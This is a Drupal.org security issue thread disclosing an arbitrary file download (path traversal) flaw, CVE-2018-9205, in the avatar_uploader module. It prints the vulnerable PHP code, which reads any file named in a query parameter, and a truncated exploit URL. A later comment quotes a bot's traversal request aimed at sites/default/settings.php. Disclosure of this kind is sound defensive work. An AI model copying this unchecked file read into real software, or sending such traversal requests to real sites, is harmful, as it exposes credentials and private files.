Arbitrary file download vulnerability in Drupal module avatar_uploader v7.x-1.0-beta8 [#2957966]

Title: Arbitrary file download vulnerability in Drupal module avatar_uploader v7.x-1.0-beta8
Author: Larry W. Cashdollar
Date: 2018-03-30
Download Site: https://www.drupal.org/project/avatar_uploader
Vendor: https://www.drupal.org/u/robbinzhao
Vendor Notified: 2018-03-30
Vendor Contact:
Description: This module used Simple Ajax Uploader, and provide a basic uploader panel, for more effect, you can do your custom javascript.
Such as, users' mouse hover on avatar, the edit link will slideup, or others.
Vulnerability:
The view.php contains code to retrieve files but no code to verify a user should be able to view files or keep them from changing the
path to outside of the uploadDir directory:

<?php

$file = $_GET['file'];

echo file_get_contents("uploadDir/$file");
exit;
[CVE-2018-9205]
Exploit Code:
http://example.com/sites/all/modules/avatar_uploader/lib/demo/view.php?f...

Comments

Comment #1

2 April 2018 at 21:17

lcashdol created an issue. See original summary.

Comment #2

lcashdol CreditAttribution: lcashdol as a volunteer commented 2 April 2018 at 21:17

Comment #3

lcashdol CreditAttribution: lcashdol as a volunteer commented 13 April 2018 at 20:39

Issue summary:

View changes

Comment #4

frederickjh

he/him

English

The Big Island of Hawai'i

CreditAttribution: frederickjh commented 16 May 2019 at 20:50

I just want to say that bots are now scanning a Drupal 8 site that I work on (so they are not going to find a Drupal 7 module). 404 links look like this:

/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../sites/default/settings.php

Not sure if that information can be of help but this security issue should be fixed.